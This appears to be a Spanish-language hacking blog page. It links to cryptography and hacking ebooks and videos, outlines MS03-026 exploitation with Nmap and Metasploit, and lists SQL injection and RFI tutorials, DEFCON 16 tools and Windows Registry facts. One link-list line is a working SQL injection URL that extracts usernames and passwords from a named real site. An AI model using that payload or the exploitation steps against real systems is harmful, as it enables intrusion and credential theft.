Banner 1

Mostrando entradas con la etiqueta documentos. Mostrar todas las entradas
Mostrando entradas con la etiqueta documentos. Mostrar todas las entradas

Documentacion sobre criptografia

0 comentarios
Navegando me encontre con algunos documentos interezantes sobre el tema aqui los comparto:

Criptografía

Iniciación a la Criptografía clásica. Partiendo de cero"
Aportación anónima de un .doc de 15 paginas que trata los conceptos más básicos para aquellos que esten empezando con la Criptografía por primera vez. RECOMENDADO.

Descarga: 1 archivo .rar sin pass. Tamaño: 120 Kb.

http://rapidshare.com/files/133868838/Aritm_tica_modular_y_Criptograf_a.rar

"Criptografía y Seguridad en Computadores"
por Manuel José Lucena López. (Versión 4-0.7.51. 11 de junio de 2008 )


* I Preliminares:
- Introducción
- Conceptos básicos

* II Fundamentos teóricos de la Criptografía:
- Teoría de la Información.
- Complejidad algorítmica.
- Aritmética modular.
- Curvas elípticas en criptografía.
- Aritmética entera de múltiple precisión.
- Criptografía y números aleatorios.

* III Algoritmos criptográficos:
- Criptografía Clásica.
- Cifrados por Bloques.
- Cifrados de Flujo.
- Cifrados Asimétricos.
- Funciones Resumen.
- Esteganografía.
- Pruebas de conocimiento cero.

* IV Aplicaciones criptográficas:
- Protocolos de comunicación segura.
- Autentificación, Certificados y Firmas digitales.
- PGP.

* V Seguridad en computadores:
- Introducción a la seguridad informática.




Descarga: 1 archivo .rar sin pass. Tamaño: 1.5 Mb. Se incluyen ficheros de muestra sobre firmas digitales y claves públicas.
http://rapidshare.com/files/133854012/Cripto.rar







"Libro electrónico de Seguridad Informática y Criptografía v4.1
" Versión 4.1 (1 de marzo de 2006). La más reciente. Autor: JORGE RAMIO AGUIRRE.


- 01 PresentaLibro Presentación del curso y libro electrónico v 4.1
- 02 BreveIntroCrip to Introducción breve y rápida a la criptografía
- 03 IntroSegInfo Introducción a la Seguridad Informática
- 04 CalidadInfo Calidad de la Información y Virus
- 05 GestionSeg Introducción a la Gestión de la Seguridad
- 06 TeoriaInfo Teoría de la Información
- 07 TeoriaNumeros Teoría de los Números
- 08 CompAlgoritmos Teoría de la Complejidad Algorítmica
- 09 CifraClasica Sistemas de Cifra Clásicos
- 10 CifraModerna Sistemas de Cifra Modernos
- 11 CifraFlujo Sistemas de Cifra en Flujo
- 12 CifraSimetrica Cifrado Simétrico en Bloque
- 13 CifraMochilas Cifrado Asimétrico con Mochilas
- 14 CifraAsimetric a Cifrado Asimétrico Exponencial
- 15 FuncionesHash Funciones Hash en Criptografía
- 16 AutenticaFirma Autenticación y Firma Digital
- 17 CertDigitalesP KCS Certificados Digitales y Estándar PKCS
- 18 CorreoSeguro Aplicaciones de Correo Seguro
- 19 ProtocolosCrip to Protocolos y Esquemas Criptográficos
- 20 CurvasEliptica s Introducción a Cifra con Curvas Elípticas (*)
- 21 BibSWTablasyOt ros Bibliografía, Enlaces, Tablas, Software y Documentos



Descarga: 1 archivo .rar sin pass. Tamaño: 6.5 Mb.
http://rapidshare.com/files/133859663/v4.1_Libro_Electronico.rar







"Criptografía Clásica"

Este ebook se trata de un extracto del tercer capítulo del libro "Aplicaciones Criptográficas", en su segunda edición de junio de 1999, ISBN 83-87238-57-2, publicado por el departamento de Publicaciones de la Escuela Universitaria de Informática de la Universidad Politécnica de Madrid, España.


* I. Cifradores históricos
- La escítala
- El cifrador de Polybios
- El cifrador del César
- El cifrador de Alberti

* II. Cifradores del siglo XIX
- El cifrador de Wheatstone
- El cifrador de Bazeries

* III. Máquinas de cifrar en el siglo XX
- La máquina Enigma
- La máquina Hagelin

* IV. Alfabetos y características del lenguaje
- Alfabetos de cifrado
- Estadísticas del lenguaje

* V. Clasificación de los Criptosistemas clásicos

* VI. Cifradores por sustitución monográmica monoalfabeto
- Cifradores por sustitución
- El cifrador del César
- Cifrador del César con clave
- Cifradores tipo César con alfabetos mixtos
- Criptoanálisis del cifrado del César
- Cifradores genéricos por sustitución
- Cifradores por desplazamiento puro
- Cifradores por decimación pura
- Cifradores por transformación afín
- Criptoanálisis de cifrados monoalfabéticos por sustitución

* VI. Cifradores por homófonos
- Cifradores por homófonos de primer orden
- Cifradores por homófonos de orden mayor
- Cifrador homofónico de segundo orden
- Criptoanálisis de los cifrados por homófonos

* VII. Cifradores por sustitución monográmica polialfabeto
- Cifradores polialfabéticos periódicos
- Cifrador de Vigenère
- Cifrador autoclave
- Cifrador de Beaufort
- Variante del cifrador de Beaufort
- Criptoanálisis de los cifrados polialfabéticos periódicos
- Método de Kasiski
- Índice de Coincidencia
- Cifradores polialfabéticos no periódicos
- Cifrador con clave continua
- Criptoanálisis de los cifrados con clave continua
- Cifrador de Vernam

* VIII. Cifradores por sustitución poligrámica monoalfabeto
- Cifrador de Playfair
- Criptoanálisis del cifrado de Playfair
- Cifrador de Hill
- Criptoanálisis del cifrado de Hill

* IX. Cifradores por transposición
- Transposición por grupos
- Transposición por series
- Transposición por columnas
- Cifrador de transposición por columnas simple con clave
- Cifrador de doble transposición por columnas
- Transposición por filas
- Criptoanálisis de los cifrados por transposición

* X. Otras transformacion es
- Transformación por adición
- Transformación por conversión de base
- Transformación por lógica de Boole
- Transformación matricial


Descarga: 1 archivo .rar sin pass. Tamaño: 1 Mb.
http://rapidshare.com/files/133866906/CriptoClasica.rar

Libros:

Aqui una pequeña lista de aquellos libros sobre Criptografía que recomendaríamos.


- "Los Códigos Secretos", de Simon Singh. (Español)
- "The Codebreakers", de David Khan. (Inglés)

NOTA: descargados y probados.

saludos roboticos

FUENTE:
http://www.tdescarga.info/foro/index.php?topic=60429.new#new

Libros de Hacker Importantes(argeniverso.66ghz)

0 comentarios

Datos Técnicos
Colección de Libros sobre Hacking
PDF | CHM | Ingles | 550 Mb

Descripción

El hacking o jaqueo se basa en el arte informático de construir y solucionar problemas que atenten contra la vulnerabilidad de un sistema o aplicación, compartiendo este mismo método con otros hackers y al contrario de lo que erróneamente suele afirmarse no es la técnica de ejecutar una aplicación para robar contraseñas y romper un sistema a través de malware, spyware o un ping, estas acciones las hacen los lamers, y en menor medida, cuando se ha hecho un ataque prolijo sabiendo lo que se hace es realizado por crackers.

En resumen, el hacking es la técnica o arte de encontrar los límites de los productos, aparatos y servicios digitales de informática o comunicaciones y compartirlo con otros y/o los fabricantes mismos de ésos productos.

Colección

* (Ebook - Computer) Hacking The Windows Registry.pdf
* (eBook - PDF) Hugo Cornwall - The Hacker's Handbook .pdf
* (eBook pdf) Hacking into computer systems - a beginners guide.pdf
* (ebook - pdf) Hacking IIS Servers.pdf
* A Beginners Guide To Hacking Computer Systems.pdf
* amazon-hacks.chm
* Attacking the DNS Protocol.pdf
* Auerbach Practical Hacking Techniques and Countermeasures Nov 2006.pdf
* bsd-hacks.pdf
* Certified Ethical Hacker (CEH) v3.0 Official Course.pdf
* Computer - Hackers Secrets - e-book.pdf
* cracking-sql-passwords.pdf
* Crc Press - The Hacker'S Handbook.pdf
* Credit Card Visa Hack Ucam Cl Tr 560.pdf
* DangerousGoogle-SearchingForSecrets.pdf
* database hacker handbook.chm
* Dummies - Hack How To Create Keygens.pdf
* ebay hacks 100 industrial strength tips and tools.pdf
* eBooks OReilly - Wireless Hacks 100 Industrial - Strength Tips and Tools.chm
* ethical hacking, student guide.pdf
* excel hacks.chm
* google hacks.pdf
* Guide to Hacking with sub7.doc
* Hack IT Security Through Penetration Testing.pdf
* Hack Proofing - Your Network - Internet Tradecraft.pdf
* Hack Proofing Linux A Guide to Open Source Security - Stangler, Lane - Syngress.pdf
* Hack Proofing Sun Solaris 8.pdf
* Hack Proofing Your E-Commerce Site.pdf
* Hack Proofing Your Identity In The Information Age.pdf
* Hack Proofing Your Network Second Edition.pdf
* Hack Proofing Your Network First Edition.pdf
* Hack Proofing Your Web Applications.pdf
* Hacker Disassembling Uncovered.chm
* hacker ethic.pdf
* Hacker Linux Uncovered.chm
* Hacker Web Exploitation Uncovered.chm
* Hacker'S.Delight.chm
* Hackers Beware.pdf
* Hackers Secrets Revealed.pdf
* Hackers Secrets.pdf
* Hackers, Heroes Of The Computer Revolution.pdf
* Hackers Secrets.pdf
* Hacker s Guide.pdf
* Hacking - Firewalls And Networks How To Hack Into Remote Computers.pdf
* Hacking - The Art of Exploitation.chm
* Hacking Cisco Routers.pdf
* Hacking Exposed - Network Security Secrets & Solutions, 2nd Edition.pdf
* Hacking Exposed Network Security Secrets & Solutions, Third Edition ch1.pdf
* Hacking For Dummies 1.pdf
* Hacking For Dummies 2.pdf
* Hacking For Dummies.pdf
* Hacking GMail.pdf
* Hacking IIS Servers.pdf
* Hacking into computer systems - a beginners guide.pdf
* hacking the windows registry.pdf
* Hacking Windows XP.pdf
* Hacking-ebook - CIA-Book-of-Dirty-Tricks1.pdf
* Hacking-Hacker's Guide.pdf
* Hacking-Hackers Secrets Revealed.pdf
* Hacking-Hugo Cornwall-The Hacker's Handbook.pdf
* Hacking-The Hacker Crackdown.pdf
* Hacking For Dummies Access To Other People's System Made Simple.pdf
* Hacking.Guide.V3.1.pdf
* Hackproofing Oracle Application Server.pdf
* Hack Attacks Revealed A Complete Reference With Custom Security Hacking Toolkit.
* Hack IT Security Through Penetration Testing.chm
* Halting.The.Hacker.A.Practical.Guide.To.Computer.Security.chm
* How to Crack CD Protections.pdf
* John Wiley & Sons - Hacking For Dummies.pdf
* John Wiley and Sons Hacking Windows XP Jul 2004 eBook-DDU.pdf
* linux-server-hacks.pdf
* little black book computer viruses.pdf
* mac-os-hacks.chm
* McGraw-Hill - Hacking Exposed, 3rd Ed - Hacking Exposed Win2.pdf
* McGraw Hacking Exposed Cisco Networks.chm
* McGraw Hill HackNotes Network Security Portable Reference eB.pdf
* McGraw Hill HackNotes Web Security Portable Reference eBook.pdf
* McGraw Hill HackNotes Windows Security Portable Reference eB.pdf
* Mind Hacks - Tips & Tricks for Using Your Brain.chm
* network-security-hacks.chm
* No Starch Press Hacking The Art Of Exploitation.chm
* O'Reilly - Online Investing Hacks.chm
* O'Reilly - Network Security Hacks.chm
* O'Reilly Windows Server Hack.chm
* O'Reilly Windows Server Hack.rar
* online-investing-hacks.chm
* OReilly Google Hacks, 1st Edition2003.pdf
* OReilly - Google Hacks.pdf
* Oreilly, Paypal Hacks (2004) Ddu.chm
* OReilly, IRC Hacks (2004).DDU.chm
* OReilly SQL Hacks.Nov.2006.chm
* OSB Ethical Hacking and Countermeasures EC Council Exam 312.50 Student Coursewar eBook LiB.chm
* O´Reilly - Windows XP Hacks.chm
* PC Games - How to Crack CD Protection.pdf
* Security and Hacking - Anti-Hacker Tool Kit Second Edition.chm
* SoTayHacker1.0.chm
* spidering-hacks.chm
* SQL Hacks.chm
* SQLInjectionWhitePaper.pdf
* Syngress - Hacking a Terror Network. The Silent Threat of Covert Channels.pdf
* Syngress - Hack Proofing Your Wireless Network.pdf
* Syngress Hack Proofing Your Identity in the Information Age.pdf
* Syngress Buffer Overflow Attacks Dec 2004 eBook-DDU.pdf
* Syngress Hack the Stack Oct 2006.pdf
* The Little Black Book Of Computer Virus.pdf
* The Little Black Book of Computer Viruses.pdf
* tivo-hacks 100 industrial strength tips and tools.pdf
* u23 Wiley - Hacking GPS - 2005 - (By Laxxuss).pdf
* Wiley The Database Hackers Handbook Defending Database Servers.chm
* Win XP Hacks oreilly 2003.chm
* Windows Server Hacks.chm
* WinXP SP1 Hack.pdf
* Xbox hack - AIM 2002 008.pdf
* Yahoo Hacks Oct 2005.chm

http://www.filefactory.com/f/5a1d06bc5aaa6997/


Esta recompilacion la encontre via argeniverso.66ghz aunque faltan muchos libros mas actuales despues la completare :D.

FUENTE:http://argeniverso.66ghz.com/index.php

saludos roboticos

Vídeos sobre seguridad/inseguridad y hacking

1 comentarios
esta recompilacion la encontre en el foro de elhacker.net muy buena por sierto , tambien hay muchas en distintas web pero con diferentes enfacis , aqui solo hay una pequeña parte asi que disfruten y felices labs.

-----------------------------------------------------------------------------------------------------

1. Basic Socket Programming: (4 videos - 65 mins)

1.1 Presentation on Socket Programming basics (25 mins)
1.2 "Type with Me" exercise - a simple TCP server (19 mins)
1.3 Coding a TCP Echo server (13 mins)
1.4 Coding a TCP Echo client (9 mins)

http://www.security-freak.net/sockets/socket-programming.html


2. Packet Sniffing using Raw Sockets: (7 videos - 86 mins)

2.1 Presentation on raw socket basics (14 mins)
2.2 Sniffer coding basics (15 mins)
2.3 Sniffer - Ethernet header parsing (10 mins)
2.4 Sniffer - IP header parsing (14 mins)
2.5 Sniffer - TCP header parsing (10 mins)
2.6 Sniffer - Data parsing (9 mins)
2.7 A look at Tcpdump and Ethereal (14 mins)

http://www.security-freak.net/raw-sockets/raw-sockets.html


3. Packet Injection using Raw Sockets: (6 videos - 75 mins)

3.1 Packet injection basics presentation (10 mins)
3.2 Your first packet injection program (9 mins)
3.3 Ethernet header contruction & injection (10 mins)
3.4 IP header construction & injection (14 mins)
3.5 TCP header and data contruction & injection (17 mins)
3.6 ARP Request query injector (15 mins)

http://www.security-freak.net/packet-injection/packet-injection.html


4. Architecture of a Proactive Security Tool: (4 videos - 43 mins)

4.1 The "Sniff - Think - Inject" logic - a presentation (10 mins)
4.2 Programming the Framework (7 mins)
4.3 Communication via the Framework (8 mins)
4.4 ARP DoS tool using the Framework (18 mins)

http://www.security-freak.net/architecture/architecture.html


5. Encryption Basics using RC4: (3 videos - 38 mins)

5.1 RC4 basics presentation (13 mins)
5.2 Understanding RC4 via simulations (13 mins)
5.3 File encryption / decryption using RC4 (12 mins)

http://www.security-freak.net/encryption/encryption-rc4.html



Irongeek - Hacking Illustrated

http://www.irongeek.com/i.php?page=security/hackingillustrated



Hackeando Smart Cards de Fedex Kinko’s
http://foro.elhacker.net/index.php/topic,116216.0.html



Hackeando webs de Lineage 2 - video
http://foro.elhacker.net/index.php/topic,154731.0.html



Pocket Bluesnarfer
http://foro.elhacker.net/index.php/topic,109882.0.html



Local JPG shell Inclusion
http://foro.elhacker.net/index.php/topic,158322.0.html


Obteniendo Shell con LFI +[VIDEO]
http://foro.elhacker.net/hacking_basico/obteniendo_shell_con_lfi_video-t217499.0.html


EaryhLink.net Hacked By w32-Gen
http://foro.elhacker.net/index.php/topic,148012.0.html



Videos SHMOOCON 23-25 Marzo 2007
http://www.shmoocon.org/2007/videos/



Ataques a controladores de dispositivos inalambricos
http://foro.elhacker.net/index.php/topic,132675.0.html



http://icaix.com/tutoriales/ARP.htm
http://icaix.com/tutoriales/ettercap.htm
http://icaix.com/tutoriales/arpwatch.htm

Botnets:
http://www.youtube.com/swf/l.swf?swf=http%3A//s.ytimg.com/yt/swf/cps-vfl87070.swf&video_id=BRhauoXpNSs&rel=1&eurl=&iurl=http%3A//i3.ytimg.com/vi/BRhauoXpNSs/hqdefault.jpg&sk=gMf9z_gob8ycD6nHUKObudoDxM_nJtRaC&ap=%26fmt%3D18&cr=US&avg_rating=4.66666666667&length_seconds=129&allow_ratings=1&title=Symantec%20Guide%20to%20Scary%20Internet%20Stuff%20-%20Botnets

De los chicos de Backtrack.fr (en francés)
http://benjy-blog.blogspot.com/

Si quieres meter ataques a teléfonos móviles, te falta el ataque Blueline contra teléfonos Motorola.

Doc: http://gospel.endorasoft.es/bluetooth/seguridad-bluetooth/blueline.html
Video: http://www.youtube.com/watch?v=4bnE5_esbOU

Youtube Hacking Too Easy: Spammers Exploiting
http://www.youtube.com/watch?v=eiW1b7KwvQI

Hacking windows xp passwords TUTORIAL!!!!
http://www.youtube.com/watch?v=qxOCQIQYuHM

Hacking wireless networks with KisMac
http://www.youtube.com/watch?v=G38PD5FyUxE

Hacking WLAN
http://www.youtube.com/watch?v=eKrAZpANoeM

How to Bypass a Windows XP Password Without any Programs
http://www.youtube.com/watch?v=oC8c7zKLnU4

Easy Windows Password Hack
http://www.youtube.com/watch?v=brpBGTyp5Qw

Fake Virus Tutorial
http://www.youtube.com/watch?v=lwSzbnIybeA

Hacking Email & Passwords
http://www.youtube.com/watch?v=j_tMFUqowRQ

Basic Yahoo ID Cracking

http://www.youtube.com/watch?v=Q5vaC0XidNc

Tripod-Lycos distribute Malware
http://www.youtube.com/watch?v=ZsJAfYimpdM

Auditing MD5 Password Hashes: http://www.irongeek.com/i.php?page=videos/md5-password-cracking

Y otra pagina para bajar videos:

http://www.hackerscenter.com/video/

tambien es exelente esta
http://www.milw0rm.com/video/#

mas de 40 videos

un curso completo de ethical hacking y es basado en videos http://foro.elhacker.net/hacking_avanzado/career_academy_hacking_penetration_testing_and_counter_17cd-t169709.0.html

Explotacion de la Vulnerabilidad RPC/DCOM: MS03-026

La sigueinte informacion es publicada con fines educativos y para ilustrar de forma real el impacto que puede tener el no estar al dia con las actualizaciones de Microsoft.

Herramientas necesarias:

* Nmap
* Metasploit 3.1
* TFTP

Como funciona

El Remote Procedure Call (RPC) permite el intercambio de información entre equipos, y está presente por defecto en el protocolo TCP bajo el puerto 135 en Windows NT 4.0, 2000 y XP.

Existe una vulnerabilidad en la parte de RPC encargada del intercambio de mensajes sobre TCP/IP, que ocasiona que uno de ellos incorrectamente creado, permita a un atacante ejecutar cualquier código con los privilegios locales (Mi PC).

Para explotar esta vulnerabilidad un atacante debe establecer una conexión TCP/IP al RPC Endpoint Mapper remoto y enviar un mensaje malformado, que provoque un desbordamiento de búfer en la memoria, pudiendo ejecutar programas, ver o borrar información, o crear nuevas cuentas con todos los privilegios.

SOs que afecta:

* Microsoft Windows NT® 4.0
* Microsoft Windows NT 4.0 Terminal Services Edition
* Microsoft Windows 2000
* Microsoft Windows XP
* Microsoft Windows Server™ 2003

Como se explota

Debemos instalar y verificar que este corriendo nuestro Servidor TFTP.

Utilizamos nmap para realizar un escaneo de los dispositivos conectados a la red. Cualquier equipo con Widows y con el puerto 135 abierto es candidato a se explotado.

Posterior mente realizamos los pasos descritos en el siguiente video.
http://rapidshare.com/files/121542450/LAINV1.rar.html

Contramedidas

Actualizar el sistema operativo con el parche correspondiene y mantener al dia las actualizaciones de nuestros equipos y o bien, contar con un firewall.


NOTA: cabe destacar que la recompilacion es hecha por varios users del foro asi que muchos agradecimientos a ellos , si alguien quiere aportar mas estan habilitadas las respuestas y comentarios.

FUENTE:http://foro.elhacker.net/hacking_avanzado/videos_sobre_seguridadinseguridad_y_hacking-t166107.0.html

saludos roboticos

links para luego mirar xD

0 comentarios
http://samur4i-x.by.ru/Tutorial.txt
http://www.wwwme.org/web.php?id=6312&modulo=stats
http://cruzenaldo.blogspot.com/2009/03/dork-buat-rfi_17.html
https://www.underground.org.mx/index.php?topic=15493.5;wap
http://www.the-art-of-web.com/system/hacker-activity/
http://www.securityadiction.com/v2/index.php?option=com_content&view=article&id=29 --RFI muy interezante
http://www.irongeek.com/i.php?page=security/hackingillustrated
http://74.125.47.132/search?q=cache:gfy2p237emIJ:www.latinhackteam.org/+latinhackteam&cd=11&hl=es&ct=clnk&gl=co
http://painboy.es/login.php --wargame
http://foro.undersecurity.net/read.php?5,993,993 --xml sql inject
http://www.linux-es.org/node/43 --crtunnel
http://foro.el-hacker.com/index.php/topic,80440.0.html --analisis basico exploit sql iject
http://www.freelists.org/post/dbsec/MySQL-50-INFORMATION-SCHEMA-and-SQL-injection --information_schema.tables
http://translate.google.com.co/translate?hl=es&langpair=en|es&u=http://www.freelists.org/post/dbsec/MySQL-50-INFORMATION-SCHEMA-and-SQL-injection&prev=/translate_s%3Fhl%3Des%26q%3Dsql%2Binjection%2BINFORMATION_SCHEMA.TABLES--%26tq%3Dsql%2Binjection%2BINFORMATION_SCHEMA.TABLES---%26sl%3Des%26tl%3Den
excelente texto
http://websecurity.ro/blog/2007/12/17/sql-injection-guide/ --sql guia
http://www.milw0rm.com/papers/202 ---FULL SQL INJECTION
http://translate.google.com.co/translate?hl=es&langpair=en|es&u=http://www.milw0rm.com/papers/202&prev=/translate_s%3Fhl%3Des%26q%3Dsql%2Binjection%2BINFORMATION_SCHEMA.TABLES--%26tq%3Dsql%2Binjection%2BINFORMATION_SCHEMA.TABLES---%26sl%3Des%26tl%3Den
muy bueno
http://www.reversing.org/node/view/13 --blind sql
http://michoacano.com.mx/how-to-mostrar-en-un-sql-injection-las-tablas-de-la-bd/ --Mostrar las tablas de una BD
http://foro.elhacker.net/tutoriales_documentacion/tutorial_de_inyeccion_sql_sql_injection-t98448.0.html --tutorial sql injection
http://www.codeproject.com/KB/web-security/SqlInjection.aspx --sql injection atack
http://xoomer.virgilio.it/cascanola2006/index2.html --cascanolahack
http://sherekan.com.ar/2008/05/16/introduccion-a-xml/ --introduccion xml
http://foro.hackhispano.com/showthread.php?t=29979 --17 herramientas para sql injecction
http://www.scribd.com/doc/3203991/Introducion-a-las-Inyeciones-Sql --introduccion a las injecciones sql
http://www.netsearch-ezine.org/ezines/ns008/ns8-0x08.txt --sql basico y avanzado
http://forums.remote-exploit.org/showthread.php?t=11449 --data recovery con autopsy
http://forum.darkc0de.com/index.php?action=vthread&forum=19&topic=4673 MOST COMPLETE SQL INJECCTED PAPER
http://ferruh.mavituna.com/sql-injection-cheatsheet-oku/ ----><-----
http://forum.darkc0de.com/index.php?action=vthread&forum=19&topic=5243 --pass linux
http://www.foro.dhackers.net/hack-basico/teoria-d-1-ataque-arp-poisoning --teoria de un ataque arp poisoon
http://www.megaunder.com.ar/hacking/11705-envenenamiento-arp.html --envenenamiento arp nemesis
http://www.compostelawireless.net/modules/sections/index.php?op=printpage&artid=11 --pent test
http://foro.elhacker.net/hacking_avanzado/rastreo_y_exploracion_de_sistemas-t244654.0.html --rastreo y exploracion de sistemas
https://security-shell.ws/showthread.php?t=449 --rfi dorks

Herramientas lanzadas en Defcom 16

0 comentarios


Beholder – by Nelson Murilo and Luis Eduardo
# Descripción: An open source wireless IDS program
# Pagina: http://www.beholderwireless.org/
# Correo: bh@beholderwireless.org

The Middler – by Jay Beale
# Descripción: The end-all be-all of MITM tools
# Pagina: http://www.themiddler.com/ (Online?)
# Preface Link: http://www.intelguardians.com/themiddler.html

ClientIPS – by Jay Beale
# Descripción: An open source inline “transparent” client-side IPS
# Pagina: http://www.ClientIPS.org/ (Online?)

Marathon Tool – by Daniel Kachakill
# Descripción: A Blind SQL Injection tool based on heavy queries
# Download Link: http://www.codeplex.com/marathontool
# Correo: dani@kachakil.com

The Phantom Protocol – by Magnus Brading
# Descripción: A Tor-like protocol that fixes some of Tor’s major attack vectors
# Pagina: http://code.google.com/p/phantom
# Correo: brading@fortego.se

ModScan – by Mark Bristow
# Descripción: A SCADA Modbus Network Scanner
# Pagina: http://modscan.googlecode.com/
# Correo: mark.bristow@gmail.com

Grendel Scan – by David Byrne
# Descripción: Web Application scanner that searches for logic and
design flaws as well as the standard flaw seen in the wild today (SQL
Injection, XSS, CSRF)
# Pagina: http://grendel-scan.com/

iKat – interactive Kiosk Attack Tool (This site has an image as a
banner that is definitely not safe for work! – You have been warned) by
Paul Craig

# Descripción: A web site that is dedicated to helping you break out of Kiosk jails
# Pagina: http://ikat.ha.cked.net
# Correo: paul.craig@security-assessment.com

DAVIX – by Jan P. Monsch and Raffael Marty
# Descripción: A SLAX based Linux Distro that is geared toward data/log visualization
# Pagina: http://code.google.com/p/davix/
# Download Link: http://www.geekceo.com/davix/davix-0.5.0.iso.gz
# Correo: jan.monsch@iplosion.com and raffy@secviz.org

CollabREate – by Chris Eagle and Tim Vidas
# Descripción: An IDA Pro plugin with a server backend that allows
multiple people to collaborate on a single RE (reverse engineering)
project.
# Pagina: http://www.idabook.com/defcon
# Correo: cseagle@gmail.com and tvidas@gmail.com

Dradis – by John Fitzpatrick
# Descripción: A tool for organizing and sharing information during a penetration test
# Pagina: http://dradis.sourceforge.net
# Correo: john.fitzpatrick@mwrinfosecurity.com

Squirtle – by Kurt Grutzmacher
# Descripción: A Rouge Server with Controlling Desires that steals NTLM hashes.
# Pagina: http://code.google.com/p/squirtle (Live?)
# Correo: grutz@jingojango.net

WhiteSpace – by Kolisar
# Descripción: A script that can hide other scripts such as CSRF and iframes in spaces and tabs
# Download Link: DEFCON 16 CD

VoIPer – by nnp
# Descripción: VoIP automated fuzzing tool with support for a large number of VoIP applications and protocols
# Pagina: http://voiper.sourceforge.net/

Barrier – by Errata Security
# Descripción: A browser plugin that pen-tests every site that you visit.
# Pagina: http://www.erratasec.com
# Correo: sales@erratasec.com

Psyche – by Ponte Technologies
# Descripción: An advanced network flow visualization tool that is not soley based on time.
# Pagina: http://psyche.pontetec.com/


DEFCON 16 CD (conversaciones, soft, etc)

File: defcon16.iso
Size: 734537728
MD5: 04F944946A3AA4B6B9C6C2E738D0B9D0
SHA1: 6F63D4E58B71D6F161793699E9DB131B75D4A8D7

Code:
http://www.i-hacked.com/freefiles/defcon16.iso
Pagina de DEFCON con archivos multimedia:
Code:
https://www.defcon.org/html/links/defcon-media-archives.html

gracias a BootSafe por postearlas

documentacion 2-ingles

0 comentarios
http://zer0z0org.blogspot.com/2009/03/rooteando-y-owneando.html
http://sansforensics.wordpress.com/2009/04/10/data-recovery-with-hex-editor-and-regex/
http://argentinasec.blogspot.com/2009/03/xss-tunneling.html
http://zer0z0org.blogspot.com/2009/03/como-rootear-easy-tutorial-by-zer0.html
http://zer0z0org.blogspot.com/2009/03/tutoriales-pdf-rooteando-y-owneando.html
http://serdis.dis.ulpgc.es/~ii-cript/PAGINA%20WEB%20CLASICA/pigpen-criptologia.html
http://xianur0.blogspot.com/2009/02/xss-bbcode-exploit-smf-all-versions.html
http://www.lastdragon.net/?p=334
http://ferruh.mavituna.com/sql-injection-cheatsheet-oku/
http://argentinasec.blogspot.com/2008/08/dns-poison-spoof-by-murder.html
http://www.zer0-z0org.com/
http://foro.colombiaunderground.org/index.php/topic,4992.0.html
http://foro.colombiaunderground.org/index.php?topic=4991.msg30225;topicseen#msg30225
https://security-shell.ws/showthread.php?t=26118
http://notesonsafety.blogspot.com/2009/02/simpleblog-2x-inyeccion-sql.html
http://www.trancek.es/2008/09/pasan-los-aos-y-el-mismo-software-de.html
http://www.packetstormsecurity.org/0811-exploits/simpleblog-mdb.txt
http://www.milw0rm.com/exploits/4239
http://www.milw0rm.com/exploits/2232
http://foro.hackhispano.com/showthread.php?t=22191
http://www.photofieds.com/SimpleBlog//admin/edit.asp?id=-1+union+select+0,uUSERNAME,uPASSWORD,0,0,0,0,0,0+from+t_users
http://www.milw0rm.com/exploits/2853
http://www.xplico.org/archives/253
http://www.securiteam.com/
http://forensicir.blogspot.com/2009/04/dns-poisoning-what-is-it-good-for.html
http://blogs.sun.com/mgil/entry/font_id_s03t_size_5

Registro de Windows

0 comentarios

Una sección del Registro es un grupo de claves, subclaves y valores del Registro que cuentan con un conjunto de archivos auxiliares que contienen copias de seguridad de sus datos. Los archivos auxiliares de todas las secciones excepto HKEY_CURRENT_USER están en la carpeta %SystemRoot%\System32\Config en Windows NT 4.0, Windows 2000, Windows XP, Windows Server 2003 y Windows Vista. Los archivos auxiliares para HKEY_CURRENT_USER están en la carpeta %SystemRoot%\Profiles\nombreDeUsuario. Las extensiones de los archivos de estas carpetas indican el tipo de datos que contienen. A veces, la falta de extensión también puede indicar el tipo de datos que contienen.

Sección del Registro Archivos auxiliares

  • HKEY_LOCAL_MACHINE\SAM - Sam, Sam.log, Sam.sav
  • HKEY_LOCAL_MACHINE\Security - Security, Security.log, Security.sav
  • HKEY_LOCAL_MACHINE\Software - Software, Software.log, Software.sav
  • HKEY_LOCAL_MACHINE\System - System, System.alt, System.log, System.sav
  • HKEY_CURRENT_CONFIG - System, System.alt, System.log, System.sav, Ntuser.dat, Ntuser.dat.log
  • HKEY_USERS\DEFAULT - Default, Default.log, Default.sav
  • En Windows 98, los archivos del Registro se denominan User.dat y System.dat. En Windows Millennium Edition, los archivos del Registro se denominan Classes.dat, User.dat y System.dat.

    Nota: las características de seguridad de Windows NT, Windows 2000, Windows XP, Windows Server 2003 y Windows Vista permiten que un administrador controle el acceso a las claves del Registro.

    La siguiente tabla enumera las claves predefinidas que utiliza el sistema. El tamaño máximo del nombre de una clave es de 255 caracteres.

  • HKEY_CURRENT_USER
  • ha iniciado sesión. Las carpetas del usuario, los colores de la pantalla y la configuración del Panel de control se almacenan aquí. Esta información está asociada al perfil del usuario. Esta clave a veces aparece abreviada como “HKCU”.

  • HKEY_USERS
  • Contiene todos los perfiles de usuario cargados activamente en el equipo. HKEY_CURRENT_USER es una subclave de HKEY_USERS. HKEY_USERS puede aparecer abreviada como “HKU”.

  • HKEY_LOCAL_MACHINE
  • Contiene información de configuración específica del equipo (para cualquier usuario). Esta clave a veces aparece abreviada como “HKLM”.

  • HKEY_CLASSES_ROOT
  • Es una subclave de HKEY_LOCAL_MACHINE\Software. La información que se almacena aquí garantiza que cuando abra un archivo con el Explorador de Windows se abrirá el programa correcto. Esta clave a veces aparece abreviada como “HKCR”. En el caso de Windows 2000, esta información se almacena en dos claves: HKEY_LOCAL_MACHINE y HKEY_CURRENT_USER. La clave HKEY_LOCAL_MACHINE\Software\Classes contiene la configuración predeterminada que se puede aplicar a todos los usuarios del equipo local. La clave HKEY_CURRENT_USER\Software\Classes contiene la configuración que invalida la configuración predeterminada y que se aplica únicamente al usuario interactivo. La clave HKEY_CLASSES_ROOT proporciona una vista del Registro que combina la información de estos dos orígenes. HKEY_CLASSES_ROOT también proporciona una vista combinada para los programas diseñados para versiones anteriores de Windows. Para cambiar la configuración del usuario interactivo, se deben realizar los cambios en HKEY_CURRENT_USER\Software\Classes en lugar de en HKEY_CLASSES_ROOT. Para cambiar la configuración predeterminada, se deben realizar los cambios en HKEY_LOCAL_MACHINE\Software\Classes. Si escribe valores en una clave de HKEY_CLASSES_ROOT, el sistema almacena la información en HKEY_LOCAL_MACHINE\Software\Classes. Si escribe valores para una clave en HKEY_CLASSES_ROOT y la clave ya existe en HKEY_CURRENT_USER\Software\Classes, el sistema almacenará la información ahí, en lugar de en HKEY_LOCAL_MACHINE\Software\Classes.

